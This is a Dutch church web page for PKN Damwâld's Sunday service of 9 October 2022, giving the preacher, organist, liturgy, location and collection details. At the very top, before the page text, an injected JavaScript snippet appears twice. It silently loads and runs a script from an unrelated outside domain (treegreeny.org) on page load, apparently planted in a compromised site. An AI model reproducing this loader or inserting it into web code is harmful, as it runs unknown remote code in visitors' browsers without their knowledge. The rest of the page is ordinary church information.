;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 oktober 2022 14:00 uur - PKN Damwâld
zondag 9 oktober 2022
14:00 uur
Let op ! ... Ds. Elverdink heeft v.w.b. het thema van de dienst bij de liturgie een extra bijlage met afbeeldingen toegevoegd. Deze kunt onderaan de pagina downloaden onder 'Bijlage'.

Kerkdienst zondag 9 oktober 2022 14:00 uur

Informatie

Voorganger:Ds. A. Elverdink, Eastermar
Organist:Jelte Cuperus
Mededeling:Let op ! ... Ds. Elverdink heeft v.w.b. het thema van de dienst bij de liturgie een extra bijlage met afbeeldingen toegevoegd. Deze kunt onderaan de pagina downloaden onder 'Bijlage'.
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
Lied voor de dienst ELB 187: 1, 3
Welkom
We zingen: NLB 89: 1, 4
Onze Hulp en Groet
Gebed
We lezen: Psalm 107: 23 – 30 NBG ‘51
We zingen: NLB 107: 12, 13
We lezen: Mattheus 8: 23 – 27 NBV
We zingen: NLB 352: 1, 2, 4, 5, 7
Preek .
We zingen: LvdK Gez. 467: 1, 2, 4
Gebeden
We zingen: NLB 93
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Kerk in Actie Zending Missionair werk

Collecte Kerk in Actie 2022 – Missionair Werk (collectenummer 22095)
Hoewel In Nederland steeds minder mensen naar de kerk gaan, is de behoefte aan zingeving groot. Kerken spelen hierop in met pioniersplekken, nieuwe christelijke geloofsgemeenschappen waar de boodschap van het evangelie wordt gedeeld op een manier waarin mensen zich herkennen. Pioniersplek Nijkleaster in Jorwert is zo'n plek van stilte, bezinning en verbinding, die zoekt naar nieuwe wegen voor geloof en spiritualiteit. Een oase van rust en stilte midden op het platteland, waar ruimte wordt gegeven aan mensen, de schepping en aan God. Als open klooster biedt Nijkleaster gastvrijheid aan mannen en vrouwen uit diverse kerken en tradities, ook aan degenen die zich niet (meer) thuis voelen binnen de bestaande kerken. Mensen ontmoeten elkaar in liturgie en gesprek, stilte en wandeling, plezier en recreatie.